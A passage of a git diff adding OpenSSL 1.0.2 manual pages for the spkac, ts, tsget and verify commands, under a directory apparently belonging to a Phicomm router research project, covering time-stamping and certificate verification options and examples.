+ SPKAC=MIG5MGUwXDANBgkqhkiG9w0BAQEFAANLADBIAkEA1cCoq2Wa3Ixs47uI7F\
+ PVwHVIPDx5yso105Y6zpozam135a8R0CpoRvkkigIyXfcCjiVi5oWk+6FfPaD03u\
+ PFoQIDAQABFgVoZWxsbzANBgkqhkiG9w0BAQQFAANBAFpQtY/FojdwkJh1bEIYuc\
+ 2EeM2KHTWPEepWYeawvHD0gQ3DngSC75YCWnnDdq+NQ3F+X4deMx9AaEglZtULwV\
+ 4=
+
+=head1 NOTES
+
+A created SPKAC with suitable DN components appended can be fed into
+the B<ca> utility.
+
+SPKACs are typically generated by Netscape when a form is submitted
+containing the B<KEYGEN> tag as part of the certificate enrollment
+process.
+
+The challenge string permits a primitive form of proof of possession
+of private key. By checking the SPKAC signature and a random challenge
+string some guarantee is given that the user knows the private key
+corresponding to the public key being certified. This is important in
+some applications. Without this it is possible for a previous SPKAC
+to be used in a "replay attack".
+
+=head1 SEE ALSO
+
+L<ca(1)|ca(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ts.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ts.pod
new file mode 100644
index 0000000..d6aa47d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ts.pod
@@ -0,0 +1,594 @@
+=pod
+
+=head1 NAME
+
+ts - Time Stamping Authority tool (client/server)
+
+=head1 SYNOPSIS
+
+B<openssl> B<ts>
+B<-query>
+[B<-rand> file:file...]
+[B<-config> configfile]
+[B<-data> file_to_hash]
+[B<-digest> digest_bytes]
+[B<-md2>|B<-md4>|B<-md5>|B<-sha>|B<-sha1>|B<-mdc2>|B<-ripemd160>|B<...>]
+[B<-policy> object_id]
+[B<-no_nonce>]
+[B<-cert>]
+[B<-in> request.tsq]
+[B<-out> request.tsq]
+[B<-text>]
+
+B<openssl> B<ts>
+B<-reply>
+[B<-config> configfile]
+[B<-section> tsa_section]
+[B<-queryfile> request.tsq]
+[B<-passin> password_src]
+[B<-signer> tsa_cert.pem]
+[B<-inkey> private.pem]
+[B<-chain> certs_file.pem]
+[B<-policy> object_id]
+[B<-in> response.tsr]
+[B<-token_in>]
+[B<-out> response.tsr]
+[B<-token_out>]
+[B<-text>]
+[B<-engine> id]
+
+B<openssl> B<ts>
+B<-verify>
+[B<-data> file_to_hash]
+[B<-digest> digest_bytes]
+[B<-queryfile> request.tsq]
+[B<-in> response.tsr]
+[B<-token_in>]
+[B<-CApath> trusted_cert_path]
+[B<-CAfile> trusted_certs.pem]
+[B<-untrusted> cert_file.pem]
+
+=head1 DESCRIPTION
+
+The B<ts> command is a basic Time Stamping Authority (TSA) client and server
+application as specified in RFC 3161 (Time-Stamp Protocol, TSP). A
+TSA can be part of a PKI deployment and its role is to provide long
+term proof of the existence of a certain datum before a particular
+time. Here is a brief description of the protocol:
+
+=over 4
+
+=item 1.
+
+The TSA client computes a one-way hash value for a data file and sends
+the hash to the TSA.
+
+=item 2.
+
+The TSA attaches the current date and time to the received hash value,
+signs them and sends the time stamp token back to the client. By
+creating this token the TSA certifies the existence of the original
+data file at the time of response generation.
+
+=item 3.
+
+The TSA client receives the time stamp token and verifies the
+signature on it. It also checks if the token contains the same hash
+value that it had sent to the TSA.
+
+=back
+
+There is one DER encoded protocol data unit defined for transporting a time
+stamp request to the TSA and one for sending the time stamp response
+back to the client. The B<ts> command has three main functions:
+creating a time stamp request based on a data file,
+creating a time stamp response based on a request, verifying if a
+response corresponds to a particular request or a data file.
+
+There is no support for sending the requests/responses automatically
+over HTTP or TCP yet as suggested in RFC 3161. The users must send the
+requests either by ftp or e-mail.
+
+=head1 OPTIONS
+
+=head2 Time Stamp Request generation
+
+The B<-query> switch can be used for creating and printing a time stamp
+request with the following options:
+
+=over 4
+
+=item B<-rand> file:file...
+
+The files containing random data for seeding the random number
+generator. Multiple files can be specified, the separator is B<;> for
+MS-Windows, B<,> for VMS and B<:> for all other platforms. (Optional)
+
+=item B<-config> configfile
+
+The configuration file to use, this option overrides the
+B<OPENSSL_CONF> environment variable. Only the OID section
+of the config file is used with the B<-query> command. (Optional)
+
+=item B<-data> file_to_hash
+
+The data file for which the time stamp request needs to be
+created. stdin is the default if neither the B<-data> nor the B<-digest>
+parameter is specified. (Optional)
+
+=item B<-digest> digest_bytes
+
+It is possible to specify the message imprint explicitly without the data
+file. The imprint must be specified in a hexadecimal format, two characters
+per byte, the bytes optionally separated by colons (e.g. 1A:F6:01:... or
+1AF601...). The number of bytes must match the message digest algorithm 
+in use. (Optional)
+
+=item B<-md2>|B<-md4>|B<-md5>|B<-sha>|B<-sha1>|B<-mdc2>|B<-ripemd160>|B<...>
+
+The message digest to apply to the data file, it supports all the message
+digest algorithms that are supported by the openssl B<dgst> command.
+The default is SHA-1. (Optional)
+
+=item B<-policy> object_id
+
+The policy that the client expects the TSA to use for creating the
+time stamp token. Either the dotted OID notation or OID names defined
+in the config file can be used. If no policy is requested the TSA will
+use its own default policy. (Optional)
+
+=item B<-no_nonce>
+
+No nonce is specified in the request if this option is
+given. Otherwise a 64 bit long pseudo-random none is
+included in the request. It is recommended to use nonce to
+protect against replay-attacks. (Optional)
+
+=item B<-cert>
+
+The TSA is expected to include its signing certificate in the
+response. (Optional)
+
+=item B<-in> request.tsq
+
+This option specifies a previously created time stamp request in DER
+format that will be printed into the output file. Useful when you need
+to examine the content of a request in human-readable
+
+format. (Optional)
+
+=item B<-out> request.tsq
+
+Name of the output file to which the request will be written. Default
+is stdout. (Optional)
+
+=item B<-text>
+
+If this option is specified the output is human-readable text format
+instead of DER. (Optional)
+
+=back
+
+=head2 Time Stamp Response generation
+
+A time stamp response (TimeStampResp) consists of a response status
+and the time stamp token itself (ContentInfo), if the token generation was
+successful. The B<-reply> command is for creating a time stamp
+response or time stamp token based on a request and printing the
+response/token in human-readable format. If B<-token_out> is not
+specified the output is always a time stamp response (TimeStampResp),
+otherwise it is a time stamp token (ContentInfo).
+
+=over 4
+
+=item B<-config> configfile
+
+The configuration file to use, this option overrides the
+B<OPENSSL_CONF> environment variable. See B<CONFIGURATION FILE
+OPTIONS> for configurable variables. (Optional)
+
+=item B<-section> tsa_section
+
+The name of the config file section conatining the settings for the
+response generation. If not specified the default TSA section is
+used, see B<CONFIGURATION FILE OPTIONS> for details. (Optional)
+
+=item B<-queryfile> request.tsq
+
+The name of the file containing a DER encoded time stamp request. (Optional)
+
+=item B<-passin> password_src
+
+Specifies the password source for the private key of the TSA. See
+B<PASS PHRASE ARGUMENTS> in L<openssl(1)|openssl(1)>. (Optional)
+
+=item B<-signer> tsa_cert.pem
+
+The signer certificate of the TSA in PEM format. The TSA signing
+certificate must have exactly one extended key usage assigned to it:
+timeStamping. The extended key usage must also be critical, otherwise
+the certificate is going to be refused. Overrides the B<signer_cert>
+variable of the config file. (Optional)
+
+=item B<-inkey> private.pem
+
+The signer private key of the TSA in PEM format. Overrides the
+B<signer_key> config file option. (Optional)
+
+=item B<-chain> certs_file.pem
+
+The collection of certificates in PEM format that will all
+be included in the response in addition to the signer certificate if
+the B<-cert> option was used for the request. This file is supposed to
+contain the certificate chain for the signer certificate from its
+issuer upwards. The B<-reply> command does not build a certificate
+chain automatically. (Optional)
+
+=item B<-policy> object_id
+
+The default policy to use for the response unless the client
+explicitly requires a particular TSA policy. The OID can be specified
+either in dotted notation or with its name. Overrides the
+B<default_policy> config file option. (Optional)
+
+=item B<-in> response.tsr
+
+Specifies a previously created time stamp response or time stamp token
+(if B<-token_in> is also specified) in DER format that will be written
+to the output file. This option does not require a request, it is
+useful e.g. when you need to examine the content of a response or
+token or you want to extract the time stamp token from a response. If
+the input is a token and the output is a time stamp response a default
+'granted' status info is added to the token. (Optional)
+
+=item B<-token_in>
+
+This flag can be used together with the B<-in> option and indicates
+that the input is a DER encoded time stamp token (ContentInfo) instead
+of a time stamp response (TimeStampResp). (Optional)
+
+=item B<-out> response.tsr
+
+The response is written to this file. The format and content of the
+file depends on other options (see B<-text>, B<-token_out>). The default is
+stdout. (Optional)
+
+=item B<-token_out>
+
+The output is a time stamp token (ContentInfo) instead of time stamp
+response (TimeStampResp). (Optional)
+
+=item B<-text>
+
+If this option is specified the output is human-readable text format
+instead of DER. (Optional)
+
+=item B<-engine> id
+
+Specifying an engine (by its unique B<id> string) will cause B<ts>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms. Default is builtin. (Optional)
+
+=back
+
+=head2 Time Stamp Response verification
+
+The B<-verify> command is for verifying if a time stamp response or time
+stamp token is valid and matches a particular time stamp request or
+data file. The B<-verify> command does not use the configuration file.
+
+=over 4
+
+=item B<-data> file_to_hash
+
+The response or token must be verified against file_to_hash. The file
+is hashed with the message digest algorithm specified in the token. 
+The B<-digest> and B<-queryfile> options must not be specified with this one.
+(Optional)
+
+=item B<-digest> digest_bytes
+
+The response or token must be verified against the message digest specified
+with this option. The number of bytes must match the message digest algorithm
+specified in the token. The B<-data> and B<-queryfile> options must not be
+specified with this one. (Optional)
+
+=item B<-queryfile> request.tsq
+
+The original time stamp request in DER format. The B<-data> and B<-digest>
+options must not be specified with this one. (Optional)
+
+=item B<-in> response.tsr
+
+The time stamp response that needs to be verified in DER format. (Mandatory)
+
+=item B<-token_in>
+
+This flag can be used together with the B<-in> option and indicates
+that the input is a DER encoded time stamp token (ContentInfo) instead
+of a time stamp response (TimeStampResp). (Optional)
+
+=item B<-CApath> trusted_cert_path
+
+The name of the directory containing the trused CA certificates of the
+client. See the similar option of L<verify(1)|verify(1)> for additional
+details. Either this option or B<-CAfile> must be specified. (Optional)
+
+
+=item B<-CAfile> trusted_certs.pem
+
+The name of the file containing a set of trusted self-signed CA 
+certificates in PEM format. See the similar option of 
+L<verify(1)|verify(1)> for additional details. Either this option 
+or B<-CApath> must be specified.
+(Optional)
+
+=item B<-untrusted> cert_file.pem
+
+Set of additional untrusted certificates in PEM format which may be
+needed when building the certificate chain for the TSA's signing
+certificate. This file must contain the TSA signing certificate and
+all intermediate CA certificates unless the response includes them.
+(Optional)
+
+=back
+
+=head1 CONFIGURATION FILE OPTIONS
+
+The B<-query> and B<-reply> commands make use of a configuration file
+defined by the B<OPENSSL_CONF> environment variable. See L<config(5)|config(5)>
+for a general description of the syntax of the config file. The
+B<-query> command uses only the symbolic OID names section
+and it can work without it. However, the B<-reply> command needs the
+config file for its operation.
+
+When there is a command line switch equivalent of a variable the
+switch always overrides the settings in the config file.
+
+=over 4
+
+=item B<tsa> section, B<default_tsa>	
+
+This is the main section and it specifies the name of another section
+that contains all the options for the B<-reply> command. This default
+section can be overridden with the B<-section> command line switch. (Optional)
+
+=item B<oid_file>
+
+See L<ca(1)|ca(1)> for description. (Optional)
+
+=item B<oid_section>
+
+See L<ca(1)|ca(1)> for description. (Optional)
+
+=item B<RANDFILE>
+
+See L<ca(1)|ca(1)> for description. (Optional)
+
+=item B<serial>
+
+The name of the file containing the hexadecimal serial number of the
+last time stamp response created. This number is incremented by 1 for
+each response. If the file does not exist at the time of response
+generation a new file is created with serial number 1. (Mandatory)
+
+=item B<crypto_device>
+
+Specifies the OpenSSL engine that will be set as the default for 
+all available algorithms. The default value is builtin, you can specify 
+any other engines supported by OpenSSL (e.g. use chil for the NCipher HSM).
+(Optional)
+
+=item B<signer_cert>
+
+TSA signing certificate in PEM format. The same as the B<-signer>
+command line option. (Optional)
+
+=item B<certs>
+
+A file containing a set of PEM encoded certificates that need to be
+included in the response. The same as the B<-chain> command line
+option. (Optional)
+
+=item B<signer_key>
+
+The private key of the TSA in PEM format. The same as the B<-inkey>
+command line option. (Optional)
+
+=item B<default_policy>
+
+The default policy to use when the request does not mandate any
+policy. The same as the B<-policy> command line option. (Optional)
+
+=item B<other_policies>
+
+Comma separated list of policies that are also acceptable by the TSA
+and used only if the request explicitly specifies one of them. (Optional)
+
+=item B<digests>
+
+The list of message digest algorithms that the TSA accepts. At least
+one algorithm must be specified. (Mandatory)
+
+=item B<accuracy>
+
+The accuracy of the time source of the TSA in seconds, milliseconds
+and microseconds. E.g. secs:1, millisecs:500, microsecs:100. If any of
+the components is missing zero is assumed for that field. (Optional)
+
+=item B<clock_precision_digits>
+
+Specifies the maximum number of digits, which represent the fraction of 
+seconds, that  need to be included in the time field. The trailing zeroes
+must be removed from the time, so there might actually be fewer digits,
+or no fraction of seconds at all. Supported only on UNIX platforms.
+The maximum value is 6, default is 0.
+(Optional)
+
+=item B<ordering>
+
+If this option is yes the responses generated by this TSA can always
+be ordered, even if the time difference between two responses is less
+than the sum of their accuracies. Default is no. (Optional)
+
+=item B<tsa_name>
+
+Set this option to yes if the subject name of the TSA must be included in
+the TSA name field of the response. Default is no. (Optional)
+
+=item B<ess_cert_id_chain>
+
+The SignedData objects created by the TSA always contain the
+certificate identifier of the signing certificate in a signed
+attribute (see RFC 2634, Enhanced Security Services). If this option
+is set to yes and either the B<certs> variable or the B<-chain> option
+is specified then the certificate identifiers of the chain will also
+be included in the SigningCertificate signed attribute. If this
+variable is set to no, only the signing certificate identifier is
+included. Default is no. (Optional)
+
+=back
+
+=head1 ENVIRONMENT VARIABLES
+
+B<OPENSSL_CONF> contains the path of the configuration file and can be
+overridden by the B<-config> command line option.
+
+=head1 EXAMPLES
+
+All the examples below presume that B<OPENSSL_CONF> is set to a proper
+configuration file, e.g. the example configuration file 
+openssl/apps/openssl.cnf will do.
+
+=head2 Time Stamp Request
+
+To create a time stamp request for design1.txt with SHA-1 
+without nonce and policy and no certificate is required in the response:
+
+  openssl ts -query -data design1.txt -no_nonce \
+	-out design1.tsq
+
+To create a similar time stamp request with specifying the message imprint
+explicitly:
+
+  openssl ts -query -digest b7e5d3f93198b38379852f2c04e78d73abdd0f4b \
+	 -no_nonce -out design1.tsq
+
+To print the content of the previous request in human readable format:
+
+  openssl ts -query -in design1.tsq -text
+
+To create a time stamp request which includes the MD-5 digest 
+of design2.txt, requests the signer certificate and nonce,
+specifies a policy id (assuming the tsa_policy1 name is defined in the
+OID section of the config file):
+
+  openssl ts -query -data design2.txt -md5 \
+	-policy tsa_policy1 -cert -out design2.tsq
+
+=head2 Time Stamp Response
+
+Before generating a response a signing certificate must be created for
+the TSA that contains the B<timeStamping> critical extended key usage extension
+without any other key usage extensions. You can add the
+'extendedKeyUsage = critical,timeStamping' line to the user certificate section
+of the config file to generate a proper certificate. See L<req(1)|req(1)>,
+L<ca(1)|ca(1)>, L<x509(1)|x509(1)> for instructions. The examples
+below assume that cacert.pem contains the certificate of the CA,
+tsacert.pem is the signing certificate issued by cacert.pem and
+tsakey.pem is the private key of the TSA.
+
+To create a time stamp response for a request:
+
+  openssl ts -reply -queryfile design1.tsq -inkey tsakey.pem \
+	-signer tsacert.pem -out design1.tsr
+
+If you want to use the settings in the config file you could just write:
+
+  openssl ts -reply -queryfile design1.tsq -out design1.tsr
+
+To print a time stamp reply to stdout in human readable format:
+
+  openssl ts -reply -in design1.tsr -text
+
+To create a time stamp token instead of time stamp response:
+
+  openssl ts -reply -queryfile design1.tsq -out design1_token.der -token_out
+
+To print a time stamp token to stdout in human readable format:
+
+  openssl ts -reply -in design1_token.der -token_in -text -token_out
+
+To extract the time stamp token from a response:
+
+  openssl ts -reply -in design1.tsr -out design1_token.der -token_out
+
+To add 'granted' status info to a time stamp token thereby creating a
+valid response:
+
+  openssl ts -reply -in design1_token.der -token_in -out design1.tsr
+
+=head2 Time Stamp Verification
+
+To verify a time stamp reply against a request:
+
+  openssl ts -verify -queryfile design1.tsq -in design1.tsr \
+	-CAfile cacert.pem -untrusted tsacert.pem
+
+To verify a time stamp reply that includes the certificate chain:
+
+  openssl ts -verify -queryfile design2.tsq -in design2.tsr \
+	-CAfile cacert.pem
+
+To verify a time stamp token against the original data file:
+  openssl ts -verify -data design2.txt -in design2.tsr \
+	-CAfile cacert.pem
+
+To verify a time stamp token against a message imprint:
+  openssl ts -verify -digest b7e5d3f93198b38379852f2c04e78d73abdd0f4b \
+	 -in design2.tsr -CAfile cacert.pem
+
+You could also look at the 'test' directory for more examples.
+
+=head1 BUGS
+
+If you find any bugs or you have suggestions please write to
+Zoltan Glozik <zglozik@opentsa.org>. Known issues:
+
+=over 4
+
+=item * No support for time stamps over SMTP, though it is quite easy
+to implement an automatic e-mail based TSA with L<procmail(1)|procmail(1)> 
+and L<perl(1)|perl(1)>. HTTP server support is provided in the form of 
+a separate apache module. HTTP client support is provided by
+L<tsget(1)|tsget(1)>. Pure TCP/IP protocol is not supported.
+
+=item * The file containing the last serial number of the TSA is not
+locked when being read or written. This is a problem if more than one
+instance of L<openssl(1)|openssl(1)> is trying to create a time stamp
+response at the same time. This is not an issue when using the apache
+server module, it does proper locking.
+
+=item * Look for the FIXME word in the source files.
+
+=item * The source code should really be reviewed by somebody else, too.
+
+=item * More testing is needed, I have done only some basic tests (see
+test/testtsa).
+
+=back
+
+=cut
+
+=head1 AUTHOR
+
+Zoltan Glozik <zglozik@opentsa.org>, OpenTSA project (http://www.opentsa.org)
+
+=head1 SEE ALSO
+
+L<tsget(1)|tsget(1)>, L<openssl(1)|openssl(1)>, L<req(1)|req(1)>, 
+L<x509(1)|x509(1)>, L<ca(1)|ca(1)>, L<genrsa(1)|genrsa(1)>, 
+L<config(5)|config(5)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/tsget.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/tsget.pod
new file mode 100644
index 0000000..56db985
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/tsget.pod
@@ -0,0 +1,194 @@
+=pod
+
+=head1 NAME
+
+tsget - Time Stamping HTTP/HTTPS client
+
+=head1 SYNOPSIS
+
+B<tsget>
+B<-h> server_url
+[B<-e> extension]
+[B<-o> output]
+[B<-v>]
+[B<-d>]
+[B<-k> private_key.pem]
+[B<-p> key_password]
+[B<-c> client_cert.pem]
+[B<-C> CA_certs.pem]
+[B<-P> CA_path]
+[B<-r> file:file...]
+[B<-g> EGD_socket]
+[request]...
+
+=head1 DESCRIPTION
+
+The B<tsget> command can be used for sending a time stamp request, as
+specified in B<RFC 3161>, to a time stamp server over HTTP or HTTPS and storing
+the time stamp response in a file. This tool cannot be used for creating the
+requests and verifying responses, you can use the OpenSSL B<ts(1)> command to
+do that. B<tsget> can send several requests to the server without closing
+the TCP connection if more than one requests are specified on the command
+line.
+
+The tool sends the following HTTP request for each time stamp request:
+
+	POST url HTTP/1.1
+	User-Agent: OpenTSA tsget.pl/<version>
+	Host: <host>:<port>
+	Pragma: no-cache
+	Content-Type: application/timestamp-query
+	Accept: application/timestamp-reply
+	Content-Length: length of body
+
+	...binary request specified by the user...
+
+B<tsget> expects a response of type application/timestamp-reply, which is
+written to a file without any interpretation.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-h> server_url
+
+The URL of the HTTP/HTTPS server listening for time stamp requests.
+
+=item B<-e> extension
+
+If the B<-o> option is not given this argument specifies the extension of the
+output files. The base name of the output file will be the same as those of
+the input files. Default extension is '.tsr'. (Optional)
+
+=item B<-o> output
+
+This option can be specified only when just one request is sent to the
+server. The time stamp response will be written to the given output file. '-'
+means standard output. In case of multiple time stamp requests or the absence
+of this argument the names of the output files will be derived from the names
+of the input files and the default or specified extension argument. (Optional)
+
+=item B<-v>
+
+The name of the currently processed request is printed on standard
+error. (Optional)
+
+=item B<-d>
+
+Switches on verbose mode for the underlying B<curl> library. You can see
+detailed debug messages for the connection. (Optional)
+
+=item B<-k> private_key.pem
+
+(HTTPS) In case of certificate-based client authentication over HTTPS
+<private_key.pem> must contain the private key of the user. The private key
+file can optionally be protected by a passphrase. The B<-c> option must also
+be specified. (Optional)
+
+=item B<-p> key_password
+
+(HTTPS) Specifies the passphrase for the private key specified by the B<-k>
+argument. If this option is omitted and the key is passphrase protected B<tsget>
+will ask for it. (Optional)
+
+=item B<-c> client_cert.pem
+
+(HTTPS) In case of certificate-based client authentication over HTTPS
+<client_cert.pem> must contain the X.509 certificate of the user.  The B<-k>
+option must also be specified. If this option is not specified no
+certificate-based client authentication will take place. (Optional)
+
+=item B<-C> CA_certs.pem
+
+(HTTPS) The trusted CA certificate store. The certificate chain of the peer's
+certificate must include one of the CA certificates specified in this file.
+Either option B<-C> or option B<-P> must be given in case of HTTPS. (Optional)
+
+=item B<-P> CA_path
+
+(HTTPS) The path containing the trusted CA certificates to verify the peer's
+certificate. The directory must be prepared with the B<c_rehash>
+OpenSSL utility. Either option B<-C> or option B<-P> must be given in case of
+HTTPS. (Optional)
+
+=item B<-rand> file:file...
+
+The files containing random data for seeding the random number
+generator. Multiple files can be specified, the separator is B<;> for
+MS-Windows, B<,> for VMS and B<:> for all other platforms. (Optional)
+
+=item B<-g> EGD_socket
+
+The name of an EGD socket to get random data from. (Optional)
+
+=item [request]...
+
+List of files containing B<RFC 3161> DER-encoded time stamp requests. If no
+requests are specified only one request will be sent to the server and it will be
+read from the standard input. (Optional)
+
+=back
+
+=head1 ENVIRONMENT VARIABLES
+
+The B<TSGET> environment variable can optionally contain default
+arguments. The content of this variable is added to the list of command line
+arguments.
+
+=head1 EXAMPLES
+
+The examples below presume that B<file1.tsq> and B<file2.tsq> contain valid
+time stamp requests, tsa.opentsa.org listens at port 8080 for HTTP requests
+and at port 8443 for HTTPS requests, the TSA service is available at the /tsa
+absolute path.
+
+Get a time stamp response for file1.tsq over HTTP, output is written to 
+file1.tsr:
+
+  tsget -h http://tsa.opentsa.org:8080/tsa file1.tsq
+
+Get a time stamp response for file1.tsq and file2.tsq over HTTP showing
+progress, output is written to file1.reply and file2.reply respectively:
+
+  tsget -h http://tsa.opentsa.org:8080/tsa -v -e .reply \
+	file1.tsq file2.tsq
+
+Create a time stamp request, write it to file3.tsq, send it to the server and
+write the response to file3.tsr:
+
+  openssl ts -query -data file3.txt -cert | tee file3.tsq \
+	| tsget -h http://tsa.opentsa.org:8080/tsa \
+	-o file3.tsr
+
+Get a time stamp response for file1.tsq over HTTPS without client
+authentication:
+
+  tsget -h https://tsa.opentsa.org:8443/tsa \
+	-C cacerts.pem file1.tsq
+
+Get a time stamp response for file1.tsq over HTTPS with certificate-based
+client authentication (it will ask for the passphrase if client_key.pem is
+protected):
+
+  tsget -h https://tsa.opentsa.org:8443/tsa -C cacerts.pem \
+	-k client_key.pem -c client_cert.pem file1.tsq
+
+You can shorten the previous command line if you make use of the B<TSGET>
+environment variable. The following commands do the same as the previous
+example:
+
+  TSGET='-h https://tsa.opentsa.org:8443/tsa -C cacerts.pem \
+	-k client_key.pem -c client_cert.pem'
+  export TSGET
+  tsget file1.tsq
+
+=head1 AUTHOR
+
+Zoltan Glozik <zglozik@opentsa.org>, OpenTSA project (http://www.opentsa.org)
+
+=head1 SEE ALSO
+
+L<openssl(1)|openssl(1)>, L<ts(1)|ts(1)>, L<curl(1)|curl(1)>, 
+B<RFC 3161>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/verify.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/verify.pod
new file mode 100644
index 0000000..df01534
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/verify.pod
@@ -0,0 +1,428 @@
+=pod
+
+=head1 NAME
+
+verify - Utility to verify certificates.
+
+=head1 SYNOPSIS
+
+B<openssl> B<verify>
+[B<-CApath directory>]
+[B<-CAfile file>]
+[B<-purpose purpose>]
+[B<-policy arg>]
+[B<-ignore_critical>]
+[B<-attime timestamp>]
+[B<-check_ss_sig>]
+[B<-crlfile file>]
+[B<-crl_check>]
+[B<-crl_check_all>]
+[B<-policy_check>]
+[B<-explicit_policy>]
+[B<-inhibit_any>]
+[B<-inhibit_map>]
+[B<-x509_strict>]
+[B<-extended_crl>]
+[B<-use_deltas>]
+[B<-policy_print>]
+[B<-untrusted file>]
+[B<-help>]
+[B<-issuer_checks>]
+[B<-verbose>]
+[B<->]
+[certificates]
+
+
+=head1 DESCRIPTION
+
+The B<verify> command verifies certificate chains.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-CApath directory>
+
+A directory of trusted certificates. The certificates should have names
+of the form: hash.0 or have symbolic links to them of this
+form ("hash" is the hashed certificate subject name: see the B<-hash> option
+of the B<x509> utility). Under Unix the B<c_rehash> script will automatically
+create symbolic links to a directory of certificates.
+
+=item B<-CAfile file>
+A file of trusted certificates. The file should contain multiple certificates
+in PEM format concatenated together.
+
+=item B<-attime timestamp>
+
+Perform validation checks using time specified by B<timestamp> and not
+current system time. B<timestamp> is the number of seconds since
+01.01.1970 (UNIX time).
+
+=item B<-check_ss_sig>
+
+Verify the signature on the self-signed root CA. This is disabled by default
+because it doesn't add any security.
+
+=item B<-crlfile file>
+
+File containing one or more CRL's (in PEM format) to load.
+
+=item B<-crl_check>
+
+Checks end entity certificate validity by attempting to look up a valid CRL.
+If a valid CRL cannot be found an error occurs.
+
+=item B<-untrusted file>
+
+A file of untrusted certificates. The file should contain multiple certificates
+in PEM format concatenated together.
+
+=item B<-purpose purpose>
+
+The intended use for the certificate. If this option is not specified,
+B<verify> will not consider certificate purpose during chain verification.
+Currently accepted uses are B<sslclient>, B<sslserver>, B<nssslserver>,
+B<smimesign>, B<smimeencrypt>. See the B<VERIFY OPERATION> section for more
+information.
+
+=item B<-help>
+
+Print out a usage message.
+
+=item B<-verbose>
+
+Print extra information about the operations being performed.
+
+=item B<-issuer_checks>
+
+Print out diagnostics relating to searches for the issuer certificate of the
+current certificate. This shows why each candidate issuer certificate was
+rejected. The presence of rejection messages does not itself imply that
+anything is wrong; during the normal verification process, several
+rejections may take place.
+
+=item B<-policy arg>
+
+Enable policy processing and add B<arg> to the user-initial-policy-set (see
+RFC5280). The policy B<arg> can be an object name an OID in numeric form.
+This argument can appear more than once.
+
+=item B<-policy_check>
+
+Enables certificate policy processing.
+
+=item B<-explicit_policy>
+
+Set policy variable require-explicit-policy (see RFC5280).
+
+=item B<-inhibit_any>
+
+Set policy variable inhibit-any-policy (see RFC5280).
+
+=item B<-inhibit_map>
+
+Set policy variable inhibit-policy-mapping (see RFC5280).
+
+=item B<-policy_print>
+
+Print out diagnostics related to policy processing.
+
+=item B<-crl_check>
+
+Checks end entity certificate validity by attempting to look up a valid CRL.
+If a valid CRL cannot be found an error occurs. 
+
+=item B<-crl_check_all>
+
+Checks the validity of B<all> certificates in the chain by attempting
+to look up valid CRLs.
+
+=item B<-ignore_critical>
+
+Normally if an unhandled critical extension is present which is not
+supported by OpenSSL the certificate is rejected (as required by RFC5280).
+If this option is set critical extensions are ignored.
+
+=item B<-x509_strict>
+
+For strict X.509 compliance, disable non-compliant workarounds for broken
+certificates.
+
+=item B<-extended_crl>
+
+Enable extended CRL features such as indirect CRLs and alternate CRL
+signing keys.
+
+=item B<-use_deltas>
+
+Enable support for delta CRLs.
+
+=item B<-check_ss_sig>
+
+Verify the signature on the self-signed root CA. This is disabled by default
+because it doesn't add any security.
+
+=item B<->
+
+Indicates the last option. All arguments following this are assumed to be
+certificate files. This is useful if the first certificate filename begins
+with a B<->.
+
+=item B<certificates>
+
+One or more certificates to verify. If no certificates are given, B<verify>
+will attempt to read a certificate from standard input. Certificates must be
+in PEM format.
+
+=back
+
+=head1 VERIFY OPERATION
+
+The B<verify> program uses the same functions as the internal SSL and S/MIME
+verification, therefore this description applies to these verify operations
+too.
+
+There is one crucial difference between the verify operations performed
+by the B<verify> program: wherever possible an attempt is made to continue
+after an error whereas normally the verify operation would halt on the
+first error. This allows all the problems with a certificate chain to be
+determined.
+
+The verify operation consists of a number of separate steps.
+
+Firstly a certificate chain is built up starting from the supplied certificate
+and ending in the root CA. It is an error if the whole chain cannot be built
+up. The chain is built up by looking up the issuers certificate of the current
+certificate. If a certificate is found which is its own issuer it is assumed 
+to be the root CA.
+
+The process of 'looking up the issuers certificate' itself involves a number
+of steps. In versions of OpenSSL before 0.9.5a the first certificate whose
+subject name matched the issuer of the current certificate was assumed to be
+the issuers certificate. In OpenSSL 0.9.6 and later all certificates
+whose subject name matches the issuer name of the current certificate are 
+subject to further tests. The relevant authority key identifier components
+of the current certificate (if present) must match the subject key identifier
+(if present) and issuer and serial number of the candidate issuer, in addition
+the keyUsage extension of the candidate issuer (if present) must permit
+certificate signing.
+
+The lookup first looks in the list of untrusted certificates and if no match
+is found the remaining lookups are from the trusted certificates. The root CA
+is always looked up in the trusted certificate list: if the certificate to
+verify is a root certificate then an exact match must be found in the trusted
+list.
+
+The second operation is to check every untrusted certificate's extensions for
+consistency with the supplied purpose. If the B<-purpose> option is not included
+then no checks are done. The supplied or "leaf" certificate must have extensions
+compatible with the supplied purpose and all other certificates must also be valid
+CA certificates. The precise extensions required are described in more detail in
+the B<CERTIFICATE EXTENSIONS> section of the B<x509> utility.
+
+The third operation is to check the trust settings on the root CA. The root
+CA should be trusted for the supplied purpose. For compatibility with previous
+versions of SSLeay and OpenSSL a certificate with no trust settings is considered
+to be valid for all purposes. 
+
+The final operation is to check the validity of the certificate chain. The validity
+period is checked against the current system time and the notBefore and notAfter
+dates in the certificate. The certificate signatures are also checked at this
+point.
+
+If all operations complete successfully then certificate is considered valid. If
+any operation fails then the certificate is not valid.
+
+=head1 DIAGNOSTICS
+
+When a verify operation fails the output messages can be somewhat cryptic. The
+general form of the error message is:
+
+ server.pem: /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test CA (1024 bit)
+ error 24 at 1 depth lookup:invalid CA certificate
+
+The first line contains the name of the certificate being verified followed by
